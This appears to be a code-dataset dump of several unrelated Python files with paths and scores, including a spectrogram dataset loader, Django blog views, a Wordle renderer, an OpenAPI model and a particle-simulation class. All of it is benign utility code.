video_idx = self.dataset[idx]
spec_path = self.video_idx2path[video_idx]
spec = np.load(spec_path) # (80, 860)
video, start_idx = video_idx.split('_')
frame_path = os.path.join(self.frame_path, video, 'frames')
start_frame_idx = non_negative(FPS * int(start_idx)/SR)
end_frame_idx = non_negative(start_frame_idx + FPS * self.L)
if self.rand_shift:
shift = random.uniform(0, 0.5)
spec_shift = int(shift * spec.shape[1] // 10)
# Since only the first second is used
spec = np.roll(spec, -spec_shift, 1)
start_frame_idx += int(FPS * shift)
end_frame_idx += int(FPS * shift)
frames = [Image.open(os.path.join(
frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
range(start_frame_idx, end_frame_idx)]
# Sample condition
if torch.all(torch.bernoulli(self.p_outside_cond) == 1.):
# Sample condition from outside video
all_idx = set(list(range(len(self.dataset))))
all_idx.remove(idx)
cond_video_idx = self.dataset[sample(all_idx, k=1)[0]]
cond_video, cond_start_idx = cond_video_idx.split('_')
else:
cond_video = video
video_hits_idx = copy.copy(self.video2indexes[video])
video_hits_idx.remove(start_idx)
cond_start_idx = sample(video_hits_idx, k=1)[0]
cond_video_idx = get_GH_data_identifier(cond_video, cond_start_idx)
cond_spec_path = self.video_idx2path[cond_video_idx]
cond_spec = np.load(cond_spec_path) # (80, 860)
cond_video, cond_start_idx = cond_video_idx.split('_')
cond_frame_path = os.path.join(self.frame_path, cond_video, 'frames')
cond_start_frame_idx = non_negative(FPS * int(cond_start_idx)/SR)
cond_end_frame_idx = non_negative(cond_start_frame_idx + FPS * self.L)
if self.rand_shift:
cond_shift = random.uniform(0, 0.5)
cond_spec_shift = int(cond_shift * cond_spec.shape[1] // 10)
# Since only the first second is used
cond_spec = np.roll(cond_spec, -cond_spec_shift, 1)
cond_start_frame_idx += int(FPS * cond_shift)
cond_end_frame_idx += int(FPS * cond_shift)
cond_frames = [Image.open(os.path.join(
cond_frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
range(cond_start_frame_idx, cond_end_frame_idx)]
# concat spec outside dataload
item['image'] = 2 * spec - 1 # (80, 860)
item['cond_image'] = 2 * cond_spec - 1 # (80, 860)
item['image'] = item['image'][:, :self.spec_take_first]
item['cond_image'] = item['cond_image'][:, :self.spec_take_first]
item['file_path_specs_'] = spec_path
item['file_path_cond_specs_'] = cond_spec_path
if self.frame_transforms is not None:
cond_frames = self.frame_transforms(cond_frames)
frames = self.frame_transforms(frames)
item['feature'] = np.stack(cond_frames + frames, axis=0) # (30 * L, 112, 112, 3)
item['file_path_feats_'] = (frame_path, start_frame_idx)
item['file_path_cond_feats_'] = (cond_frame_path, cond_start_frame_idx)
item['label'] = self.video_idx2label[video_idx]
item['target'] = self.label2target[item['label']]
if self.spec_transforms is not None:
item = self.spec_transforms(item)
except Exception:
print(sys.exc_info()[2])
print('!!!!!!!!!!!!!!!!!!!!', video_idx, cond_video_idx)
print('!!!!!!!!!!!!!!!!!!!!', end_frame_idx, cond_end_frame_idx)
exit(1)
return item
def validate_data(self):
original_len = len(self.dataset)
valid_dataset = []
for video_idx in tqdm(self.dataset):
video, start_idx = video_idx.split('_')
frame_path = os.path.join(self.frame_path, video, 'frames')
start_frame_idx = non_negative(FPS * int(start_idx)/SR)
end_frame_idx = non_negative(start_frame_idx + FPS * (self.L + 0.6))
if os.path.exists(os.path.join(frame_path, f'frame{end_frame_idx:0>6d}.jpg')):
valid_dataset.append(video_idx)
else:
self.video2indexes[video].remove(start_idx)
for video_idx in valid_dataset:
video, start_idx = video_idx.split('_')
if len(self.video2indexes[video]) == 1:
valid_dataset.remove(video_idx)
if original_len != len(valid_dataset):
print(f'Validated dataset with enough frames: {len(valid_dataset)}')
self.dataset = valid_dataset
split_clip_ids_path = os.path.join(self.splits_path, f'greatesthit_{self.split}_{self.L:.2f}.json')
if not os.path.exists(split_clip_ids_path):
with open(split_clip_ids_path, 'w') as f:
json.dump(valid_dataset, f)
def make_split_files(self, ratio=[0.85, 0.1, 0.05]):
random.seed(1337)
print(f'The split files do not exist @ {self.splits_path}. Calculating the new ones.')
# The downloaded videos (some went missing on YouTube and no longer available)
available_mel_paths = set(glob(os.path.join(self.specs_dir, '*_mel.npy')))
self.available_video_hit = [vh for vh in self.available_video_hit if self.video_idx2path[vh] in available_mel_paths]
all_video = list(self.video2indexes.keys())
print(f'The number of clips available after download: {len(self.available_video_hit)}')
print(f'The number of videos available after download: {len(all_video)}')
available_idx = list(range(len(all_video)))
random.shuffle(available_idx)
assert sum(ratio) == 1.
cut_train = int(ratio[0] * len(all_video))
cut_test = cut_train + int(ratio[1] * len(all_video))
train_idx = available_idx[:cut_train]
test_idx = available_idx[cut_train:cut_test]
valid_idx = available_idx[cut_test:]
train_video = [all_video[i] for i in train_idx]
test_video = [all_video[i] for i in test_idx]
valid_video = [all_video[i] for i in valid_idx]
train_video_hit = []
for v in train_video:
train_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
test_video_hit = []
for v in test_video:
test_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
valid_video_hit = []
for v in valid_video:
valid_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
# mix train and valid for better validation loss
mixed = train_video_hit + valid_video_hit
random.shuffle(mixed)
split = int(len(mixed) * ratio[0] / (ratio[0] + ratio[2]))
train_video_hit = mixed[:split]
valid_video_hit = mixed[split:]
with open(os.path.join(self.splits_path, 'greatesthit_train.json'), 'w') as train_file,\
open(os.path.join(self.splits_path, 'greatesthit_test.json'), 'w') as test_file,\
open(os.path.join(self.splits_path, 'greatesthit_valid.json'), 'w') as valid_file:
json.dump(train_video_hit, train_file)
json.dump(test_video_hit, test_file)
json.dump(valid_video_hit, valid_file)
print(f'Put {len(train_idx)} clips to the train set and saved it to ./data/greatesthit_train.json')
print(f'Put {len(test_idx)} clips to the test set and saved it to ./data/greatesthit_test.json')
print(f'Put {len(valid_idx)} clips to the valid set and saved it to ./data/greatesthit_valid.json')
class CondGreatestHitSpecsCondOnImageTrain(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
train_transforms = transforms.Compose([
Resize3D(128),
RandomResizedCrop3D(112, scale=(0.5, 1.0)),
RandomHorizontalFlip3D(),
ColorJitter3D(brightness=0.1, saturation=0.1),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('train', frame_transforms=train_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageValidation(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
valid_transforms = transforms.Compose([
Resize3D(128),
CenterCrop3D(112),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('valid', frame_transforms=valid_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageTest(CondGreatestHitSpecsCondOnImage):
def __init__(self, dataset_cfg):
test_transforms = transforms.Compose([
Resize3D(128),
CenterCrop3D(112),
ToTensor3D(),
Normalize3D(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
super().__init__('test', frame_transforms=test_transforms, **dataset_cfg)
if __name__ == '__main__':
import sys
from omegaconf import OmegaConf
cfg = OmegaConf.load('configs/greatesthit_transformer_with_vNet_randshift_2s_outside_video.yaml')
data = instantiate_from_config(cfg.data)
data.prepare_data()
data.setup()
print(len(data.datasets['train']))
# print(data.datasets['train'][24])
# print(data.datasets['validation'][24])
# print(data.datasets['test'][24])
# print(data.datasets['train'][24]['feature'].shape) | 0.475362 | 0.111241 |
import re
class classification:
#constructor is a single number or a range
def __init__(self, id):
self.id = id
#self.id = self.id.replace('O','0')
def is_sane(self):
sane = True
if not reduce(lambda a, b: a and b,
map(lambda c: c in '0123456789.', self.id)):
sane = False
elif len(self.id.split('.')) == 1 and len(self.id) > 3:
sane = False
return sane
def len(self):
return len(self.id.replace('.',''))
class classification_range():
def __init__(self, classification_a, classification_b):
if not classification_a.len() == classification_b.len():
raise AssertionError('Classification length mismatch')
if not classification_a.id[:-1] == classification_b.id[:-1]:
raise AssertionError('Range ends must share all digits but last')
elif classification_a.id[-1] <= classification_b.id[-1]:
self.start_classification = classification_a
self.end_classification = classification_b
else:
self.start_classification = classification_b
self.end_classification = classification_a
def iterrange(self):
classification_range = []
pre = self.start_classification.id[:-1]
s = int(self.start_classification.id[-1])
e = int(self.end_classification.id[-1])
for i in range(s,e+1):
classification_range.append(classification(pre+str(i)))
return classification_range
def ids(self):
return map(lambda x: x.id, self.iterrange())
def test():
tests = {'35291': False,
'35299': False,
'805': True,
'809': True,
'81': True,
'89': True,
'033.1': True,
'033.8': True}
testresults = list()
for test, validity in tests.iteritems():
t = classification(test)
testresults.append(t.is_sane() == validity)
if all(testresults):
print 'classifications passed'
else:
print 'classifications not passed'
trange_a, trange_b = '033.1', '033.8'
crange = classification_range(classification(trange_b), classification(trange_a))
trange =['033.1', '033.2', '033.3', '033.4', '033.5', '033.6', '033.7', '033.8']
if trange == map(lambda a: a.id, crange.iterrange()):
print 'classfication_range passed' | pyddc.py | import re
class classification:
#constructor is a single number or a range
def __init__(self, id):
self.id = id
#self.id = self.id.replace('O','0')
def is_sane(self):
sane = True
if not reduce(lambda a, b: a and b,
map(lambda c: c in '0123456789.', self.id)):
sane = False
elif len(self.id.split('.')) == 1 and len(self.id) > 3:
sane = False
return sane
def len(self):
return len(self.id.replace('.',''))
class classification_range():
def __init__(self, classification_a, classification_b):
if not classification_a.len() == classification_b.len():
raise AssertionError('Classification length mismatch')
if not classification_a.id[:-1] == classification_b.id[:-1]:
raise AssertionError('Range ends must share all digits but last')
elif classification_a.id[-1] <= classification_b.id[-1]:
self.start_classification = classification_a
self.end_classification = classification_b
else:
self.start_classification = classification_b
self.end_classification = classification_a
def iterrange(self):
classification_range = []
pre = self.start_classification.id[:-1]
s = int(self.start_classification.id[-1])
e = int(self.end_classification.id[-1])
for i in range(s,e+1):
classification_range.append(classification(pre+str(i)))
return classification_range
def ids(self):
return map(lambda x: x.id, self.iterrange())
def test():
tests = {'35291': False,
'35299': False,
'805': True,
'809': True,
'81': True,
'89': True,
'033.1': True,
'033.8': True}
testresults = list()
for test, validity in tests.iteritems():
t = classification(test)
testresults.append(t.is_sane() == validity)
if all(testresults):
print 'classifications passed'
else:
print 'classifications not passed'
trange_a, trange_b = '033.1', '033.8'
crange = classification_range(classification(trange_b), classification(trange_a))
trange =['033.1', '033.2', '033.3', '033.4', '033.5', '033.6', '033.7', '033.8']
if trange == map(lambda a: a.id, crange.iterrange()):
print 'classfication_range passed' | 0.372619 | 0.413892 |
import csv
import json
import xlrd
import argparse
"""
## Usage
python mic_lglist_to_json.py mic-lglist.xls -x
## Input
- 総務省トップ > 政策 > 地方行財政 > 電子自治体 > 全国地方公共団体コード
https://www.soumu.go.jp/denshijiti/code.html
- 都道府県コード及び市区町村コード」(令和元年5月1日現在)
curl -o mic-lglist.xls https://www.soumu.go.jp/main_content/000618153.xls
```
団体コード 都道府県名 市町村名
```
## Output with -x option
const lgList = [
{id:1, text:"USA", inc:[
{text:"west", inc:[
{id:111, text:"California", inc:[
{id:1111, text:"Los Angeles", inc:[
{id:11111, text:"Hollywood"}
]},
{id:1112, text:"San Diego"}
]},
{id:112, text:"Oregon"}
]}
]},
{id:2, text:"India"},
{id:3, text:"中国"}
];
"""
def make_select2(rows):
def append_inc(parent, a):
parent.append({
"id": a,
"text": a
})
lg_data = []
parent = None
for row in rows:
if parent is not None:
if parent["id"] == row[1].value:
append_inc(parent["inc"], "".join([row[1].value, row[2].value]))
continue
else:
# next prefecture.
lg_data.append(parent)
pass
# init
parent = { "id": row[1].value, "text": row[1].value, "inc": [] }
return lg_data
def make_kv(rows):
lg_data = {}
cities = []
pref = None
for row in rows:
if row[2].value == "":
if len(cities) > 0:
lg_data.update({ pref: cities })
cities = []
pref = row[1].value
else:
cities.append(row[2].value)
lg_data.update({ pref: cities })
return lg_data
#
# main
#
ap = argparse.ArgumentParser()
ap.add_argument("xls_file", help="XLS file taken from MIC.")
ap.add_argument("-i", action="store", dest="indent", type=int,
help="specify the number of columns for indent. e.g. -i 4")
ap.add_argument("-s", action="store", dest="skip_lines", type=int, default=1,
help="""specify the number of lines at the header
in the file to skip.""")
ap.add_argument("-x", action="store_true", dest="transx",
help="enable to make a dict for other program (e.g. select2).")
ap.add_argument("-d", action="store_true", dest="debug",
help="enable debug mode.")
opt = ap.parse_args()
xls_wb = xlrd.open_workbook(opt.xls_file)
if opt.debug:
print("sheets =", xls_wb.sheet_names())
xls_sheet = xls_wb.sheet_by_index(0)
rows = xls_sheet.get_rows()
for _ in range(opt.skip_lines):
row = rows.__next__()
if opt.transx:
lg_data = make_select2(rows)
if opt.transx:
print("const lgList = ", end="")
print(json.dumps(lg_data, indent=opt.indent, ensure_ascii=False))
print(";")
else:
print("{")
for pref,cities in make_kv(rows).items():
print(f" '{pref}': [ ")
for i,k in enumerate(cities):
if i%4 == 0:
print(" "*8, end="")
print(f"'{k}'", end="")
# 0 1 2 3
# 4 5
if i%4 == 3:
print(",")
elif i+1 == len(cities):
print("")
else:
print(", ", end="")
print(" ],")
print("}") | tools/mic_lglist_to_json.py | 団体コード 都道府県名 市町村名 | 0.181336 | 0.457682 |
from django.shortcuts import render, Http404, get_object_or_404, redirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.http import HttpResponseRedirect
from django.views import View
from django.contrib.auth.models import User
from .forms import CommentForm
from .models import Index, Post, Comment
# Create your views here.
class Home(View):
def get(self, request, *args, **kwargs):
index = Index.objects.all()
context = {
'index': index,
}
return render(request, "home.html", context)
class IndexView(View):
def get(self, request, pk, *args, **kwargs):
index = get_object_or_404(Index, pk=pk)
post_list = index.post_set.filter(status='published')
paginator = Paginator(post_list, 5)
page = request.GET.get('page')
try:
post = paginator.page(page)
except PageNotAnInteger:
post = paginator.page(1)
except EmptyPage:
post = paginator.page(paginator.num_pages)
context = {
'index': index,
'post': post,
}
return render(request, "blog/index.html", context)
class PostView(View):
def get(self, request, post_id, *args, **kwargs):
post = get_object_or_404(Post, pk=post_id, status='published')
comment = post.comment_set.all()
context = {
'post': post,
'comment': comment,
}
return render(request, "blog/post_list.html", context)
def comment_new(request):
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.save()
return redirect('/')
else:
form = CommentForm()
context = {
'form': form,
}
return render(request, 'blog/comment.html', context)
def post_draft(request):
post = Post.objects.filter(status='draft')
context = {
'post': post,
}
return render(request, 'blog/post_draft.html', context) | louis/webdev/myblog/blog/views.py | from django.shortcuts import render, Http404, get_object_or_404, redirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.http import HttpResponseRedirect
from django.views import View
from django.contrib.auth.models import User
from .forms import CommentForm
from .models import Index, Post, Comment
# Create your views here.
class Home(View):
def get(self, request, *args, **kwargs):
index = Index.objects.all()
context = {
'index': index,
}
return render(request, "home.html", context)
class IndexView(View):
def get(self, request, pk, *args, **kwargs):
index = get_object_or_404(Index, pk=pk)
post_list = index.post_set.filter(status='published')
paginator = Paginator(post_list, 5)
page = request.GET.get('page')
try:
post = paginator.page(page)
except PageNotAnInteger:
post = paginator.page(1)
except EmptyPage:
post = paginator.page(paginator.num_pages)
context = {
'index': index,
'post': post,
}
return render(request, "blog/index.html", context)
class PostView(View):
def get(self, request, post_id, *args, **kwargs):
post = get_object_or_404(Post, pk=post_id, status='published')
comment = post.comment_set.all()
context = {
'post': post,
'comment': comment,
}
return render(request, "blog/post_list.html", context)
def comment_new(request):
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.save()
return redirect('/')
else:
form = CommentForm()
context = {
'form': form,
}
return render(request, 'blog/comment.html', context)
def post_draft(request):
post = Post.objects.filter(status='draft')
context = {
'post': post,
}
return render(request, 'blog/post_draft.html', context) | 0.440951 | 0.062445 |
import os
from abc import ABC
from enum import Enum
from typing import List
from xtermcolor import colorize
class Score(Enum):
BLANK = 0
INCORRECT = 1
INCORRECT_POSITION = 2
CORRECT = 3
class Renderer(ABC):
"""
Abstract class that contains rendering logic.
Subclass this to a concrete class definition.
"""
def __init__(self, length: int, attempts: int) -> None:
self.title = self._render_title(length=length)
self.board = [self._char_blank() * length] * attempts
self.guesses: List[str] = []
self.attempt = 0
def _render_title(self, length: int):
raise NotImplementedError()
def _print_guesses(self):
if self.guesses:
print("Previous guesses:")
for guess in self.guesses:
print(guess)
print("\n")
def _clear_output(self):
os.system("cls" if os.name == "nt" else "printf '\033c'")
def _char_blank(self):
raise NotImplementedError()
def _char_incorrect(self, char: str):
raise NotImplementedError()
def _char_incorrect_position(self, char: str):
raise NotImplementedError()
def _char_correct(self, char: str):
raise NotImplementedError()
def render_board(self):
self._clear_output()
print(self.title)
for row in self.board:
print(row)
def update_board(self, guesses: List[str], scores: List[List[Score]]):
"""
Lazily renders the latest guess and score only,
instead of re-rendering the entire board
Args:
guesses (List[str]): List of all valid guesses to date
scores (List[List[Score]]): List of List[Score], corresponding to guesses
"""
row = ""
self.guesses = guesses
for char, score in zip(guesses[-1], scores[-1]):
if score == Score.INCORRECT:
row += self._char_incorrect(char)
elif score == Score.INCORRECT_POSITION:
row += self._char_incorrect_position(char)
else:
row += self._char_correct(char)
self.board[self.attempt] = row
self.attempt += 1
self.render_board()
class AsciiRenderer(Renderer):
"""
Renderer that uses ASCII characters to show progress.
"""
HEX_WHITE = 0xFFFFFF
HEX_GREY = 0x3C3C3E
HEX_YELLOW = 0xAD9E45
HEX_GREEN = 0x688C52
def _char_blank(self):
return colorize("___", rgb=self.HEX_WHITE, bg=self.HEX_WHITE)
def _char_incorrect(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREY)
def _char_incorrect_position(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_YELLOW)
def _char_correct(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREEN)
def _render_title(self, length: int):
return "pyWORDLE".center(length * 3)
class EmojiRenderer(Renderer):
"""
Renderer that uses emoji squares to show progress.
Overrides render_board() to also include guess history.
"""
def _char_blank(self):
return "⬜"
def _char_incorrect(self, char: str):
return "⬛"
def _char_incorrect_position(self, char: str):
return "🟨"
def _char_correct(self, char: str):
return "🟩"
def _render_title(self, length: int):
return "pyWORDLE".center(length * 2)
def render_board(self):
super().render_board()
self._print_guesses() | renderer.py | import os
from abc import ABC
from enum import Enum
from typing import List
from xtermcolor import colorize
class Score(Enum):
BLANK = 0
INCORRECT = 1
INCORRECT_POSITION = 2
CORRECT = 3
class Renderer(ABC):
"""
Abstract class that contains rendering logic.
Subclass this to a concrete class definition.
"""
def __init__(self, length: int, attempts: int) -> None:
self.title = self._render_title(length=length)
self.board = [self._char_blank() * length] * attempts
self.guesses: List[str] = []
self.attempt = 0
def _render_title(self, length: int):
raise NotImplementedError()
def _print_guesses(self):
if self.guesses:
print("Previous guesses:")
for guess in self.guesses:
print(guess)
print("\n")
def _clear_output(self):
os.system("cls" if os.name == "nt" else "printf '\033c'")
def _char_blank(self):
raise NotImplementedError()
def _char_incorrect(self, char: str):
raise NotImplementedError()
def _char_incorrect_position(self, char: str):
raise NotImplementedError()
def _char_correct(self, char: str):
raise NotImplementedError()
def render_board(self):
self._clear_output()
print(self.title)
for row in self.board:
print(row)
def update_board(self, guesses: List[str], scores: List[List[Score]]):
"""
Lazily renders the latest guess and score only,
instead of re-rendering the entire board
Args:
guesses (List[str]): List of all valid guesses to date
scores (List[List[Score]]): List of List[Score], corresponding to guesses
"""
row = ""
self.guesses = guesses
for char, score in zip(guesses[-1], scores[-1]):
if score == Score.INCORRECT:
row += self._char_incorrect(char)
elif score == Score.INCORRECT_POSITION:
row += self._char_incorrect_position(char)
else:
row += self._char_correct(char)
self.board[self.attempt] = row
self.attempt += 1
self.render_board()
class AsciiRenderer(Renderer):
"""
Renderer that uses ASCII characters to show progress.
"""
HEX_WHITE = 0xFFFFFF
HEX_GREY = 0x3C3C3E
HEX_YELLOW = 0xAD9E45
HEX_GREEN = 0x688C52
def _char_blank(self):
return colorize("___", rgb=self.HEX_WHITE, bg=self.HEX_WHITE)
def _char_incorrect(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREY)
def _char_incorrect_position(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_YELLOW)
def _char_correct(self, char: str):
return colorize(f" {char} ", rgb=self.HEX_WHITE, bg=self.HEX_GREEN)
def _render_title(self, length: int):
return "pyWORDLE".center(length * 3)
class EmojiRenderer(Renderer):
"""
Renderer that uses emoji squares to show progress.
Overrides render_board() to also include guess history.
"""
def _char_blank(self):
return "⬜"
def _char_incorrect(self, char: str):
return "⬛"
def _char_incorrect_position(self, char: str):
return "🟨"
def _char_correct(self, char: str):
return "🟩"
def _render_title(self, length: int):
return "pyWORDLE".center(length * 2)
def render_board(self):
super().render_board()
self._print_guesses() | 0.775435 | 0.290981 |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server import util
class UserCreateRequest(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, login=None, email=None, password=None, name=None, avatar_url=None, bio=None): # noqa: E501
"""UserCreateRequest - a model defined in OpenAPI
:param login: The login of this UserCreateRequest. # noqa: E501
:type login: str
:param email: The email of this UserCreateRequest. # noqa: E501
:type email: str
:param password: The password of this UserCreateRequest. # noqa: E501
:type password: str
:param name: The name of this UserCreateRequest. # noqa: E501
:type name: str
:param avatar_url: The avatar_url of this UserCreateRequest. # noqa: E501
:type avatar_url: str
:param bio: The bio of this UserCreateRequest. # noqa: E501
:type bio: str
"""
self.openapi_types = {
'login': str,
'email': str,
'password': str,
'name': str,
'avatar_url': str,
'bio': str
}
self.attribute_map = {
'login': 'login',
'email': 'email',
'password': 'password',
'name': 'name',
'avatar_url': 'avatarUrl',
'bio': 'bio'
}
self._login = login
self._email = email
self._password = password
self._name = name
self._avatar_url = avatar_url
self._bio = bio
@classmethod
def from_dict(cls, dikt) -> 'UserCreateRequest':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The UserCreateRequest of this UserCreateRequest. # noqa: E501
:rtype: UserCreateRequest
"""
return util.deserialize_model(dikt, cls)
@property
def login(self):
"""Gets the login of this UserCreateRequest.
:return: The login of this UserCreateRequest.
:rtype: str
"""
return self._login
@login.setter
def login(self, login):
"""Sets the login of this UserCreateRequest.
:param login: The login of this UserCreateRequest.
:type login: str
"""
if login is None:
raise ValueError("Invalid value for `login`, must not be `None`") # noqa: E501
self._login = login
@property
def email(self):
"""Gets the email of this UserCreateRequest.
An email address # noqa: E501
:return: The email of this UserCreateRequest.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this UserCreateRequest.
An email address # noqa: E501
:param email: The email of this UserCreateRequest.
:type email: str
"""
if email is None:
raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
self._email = email
@property
def password(self):
"""Gets the password of this UserCreateRequest.
:return: The password of this UserCreateRequest.
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this UserCreateRequest.
:param password: The password of this UserCreateRequest.
:type password: str
"""
if password is None:
raise ValueError("Invalid value for `password`, must not be `None`") # noqa: E501
self._password = password
@property
def name(self):
"""Gets the name of this UserCreateRequest.
:return: The name of this UserCreateRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserCreateRequest.
:param name: The name of this UserCreateRequest.
:type name: str
"""
self._name = name
@property
def avatar_url(self):
"""Gets the avatar_url of this UserCreateRequest.
:return: The avatar_url of this UserCreateRequest.
:rtype: str
"""
return self._avatar_url
@avatar_url.setter
def avatar_url(self, avatar_url):
"""Sets the avatar_url of this UserCreateRequest.
:param avatar_url: The avatar_url of this UserCreateRequest.
:type avatar_url: str
"""
self._avatar_url = avatar_url
@property
def bio(self):
"""Gets the bio of this UserCreateRequest.
:return: The bio of this UserCreateRequest.
:rtype: str
"""
return self._bio
@bio.setter
def bio(self, bio):
"""Sets the bio of this UserCreateRequest.
:param bio: The bio of this UserCreateRequest.
:type bio: str
"""
self._bio = bio | apps/api/openapi_server/models/user_create_request.py |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server import util
class UserCreateRequest(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, login=None, email=None, password=None, name=None, avatar_url=None, bio=None): # noqa: E501
"""UserCreateRequest - a model defined in OpenAPI
:param login: The login of this UserCreateRequest. # noqa: E501
:type login: str
:param email: The email of this UserCreateRequest. # noqa: E501
:type email: str
:param password: The password of this UserCreateRequest. # noqa: E501
:type password: str
:param name: The name of this UserCreateRequest. # noqa: E501
:type name: str
:param avatar_url: The avatar_url of this UserCreateRequest. # noqa: E501
:type avatar_url: str
:param bio: The bio of this UserCreateRequest. # noqa: E501
:type bio: str
"""
self.openapi_types = {
'login': str,
'email': str,
'password': str,
'name': str,
'avatar_url': str,
'bio': str
}
self.attribute_map = {
'login': 'login',
'email': 'email',
'password': 'password',
'name': 'name',
'avatar_url': 'avatarUrl',
'bio': 'bio'
}
self._login = login
self._email = email
self._password = password
self._name = name
self._avatar_url = avatar_url
self._bio = bio
@classmethod
def from_dict(cls, dikt) -> 'UserCreateRequest':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The UserCreateRequest of this UserCreateRequest. # noqa: E501
:rtype: UserCreateRequest
"""
return util.deserialize_model(dikt, cls)
@property
def login(self):
"""Gets the login of this UserCreateRequest.
:return: The login of this UserCreateRequest.
:rtype: str
"""
return self._login
@login.setter
def login(self, login):
"""Sets the login of this UserCreateRequest.
:param login: The login of this UserCreateRequest.
:type login: str
"""
if login is None:
raise ValueError("Invalid value for `login`, must not be `None`") # noqa: E501
self._login = login
@property
def email(self):
"""Gets the email of this UserCreateRequest.
An email address # noqa: E501
:return: The email of this UserCreateRequest.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this UserCreateRequest.
An email address # noqa: E501
:param email: The email of this UserCreateRequest.
:type email: str
"""
if email is None:
raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
self._email = email
@property
def password(self):
"""Gets the password of this UserCreateRequest.
:return: The password of this UserCreateRequest.
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this UserCreateRequest.
:param password: The password of this UserCreateRequest.
:type password: str
"""
if password is None:
raise ValueError("Invalid value for `password`, must not be `None`") # noqa: E501
self._password = password
@property
def name(self):
"""Gets the name of this UserCreateRequest.
:return: The name of this UserCreateRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserCreateRequest.
:param name: The name of this UserCreateRequest.
:type name: str
"""
self._name = name
@property
def avatar_url(self):
"""Gets the avatar_url of this UserCreateRequest.
:return: The avatar_url of this UserCreateRequest.
:rtype: str
"""
return self._avatar_url
@avatar_url.setter
def avatar_url(self, avatar_url):
"""Sets the avatar_url of this UserCreateRequest.
:param avatar_url: The avatar_url of this UserCreateRequest.
:type avatar_url: str
"""
self._avatar_url = avatar_url
@property
def bio(self):
"""Gets the bio of this UserCreateRequest.
:return: The bio of this UserCreateRequest.
:rtype: str
"""
return self._bio
@bio.setter
def bio(self, bio):
"""Sets the bio of this UserCreateRequest.
:param bio: The bio of this UserCreateRequest.
:type bio: str
"""
self._bio = bio | 0.755457 | 0.068444 |
import numpy as np
import matplotlib.pyplot as plt
import random
import detector as dct
class Particle:
def __init__(self,id,pos,mu,energy):
self.id = id
self.__x = pos[0]
self.__y = pos[1]
self.__z = pos[2]
self.__mu_x = mu[0]
self.__mu_y = mu[1]
self.__mu_z = mu[2]
self.__energy = 0
self.__weight = 1
self.__is_alive = True
@property
def mu(self):
return [self.__mu_x,self.__mu_y, self.__mu_z]
@property
def position(self):
return [self.__x, self.__y, self.__z]
@property
def energy(self):
return self.__energy
@property
def is_alive(self):
return self.__is_alive
@position.setter
def position(self, value):
self.__x = value[0]
self.__y = value[1]
self.__z = value[2]
@energy.setter
def energy(self, value):
self.__energy = value
def pprint(self):
print(self.__x,self.__y,self.__z,self.__mu_x,self.__mu_y, self.__mu_z)
def gen_random_angles(self):
angle_data = {}
zeta = random.random()
phi = 2*np.pi*zeta
angle_data["cos_theta"] = 2*zeta - 1
angle_data["sin_theta"] = np.sqrt(1 - angle_data["cos_theta"]**2)
angle_data["cos_phi"] = np.cos(phi)
angle_data["sin_phi"] = np.sin(phi)
return angle_data
def update_weight(self,mu_t,mu_a):
treshold = 0.2
self.__weight = self.__weight*(1- mu_a/mu_t)
if self.__weight < treshold:
self.__is_alive = False
def is_in_detector(self,detector):
# check if the particle is in the detector
if isinstance(detector, dct.Detector):
if detector.parametric_check(self):
return True
else:
return False
else:
raise Warning("Volume is not a detector")
def evolve(self,s):
self.__x = self.__x + self.__mu_x*s
self.__y = self.__y + self.__mu_y*s
self.__z = self.__z + self.__mu_z*s
def update_energy(self, cos_theta):
pass
def update_cosines(self, sin_theta, cos_theta, sin_phi, cos_phi):
# we update to the new cosines after interaction
self.__mu_x = sin_theta*(self.__mu_x*self.__mu_z - self.__mu_y*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_x*cos_theta
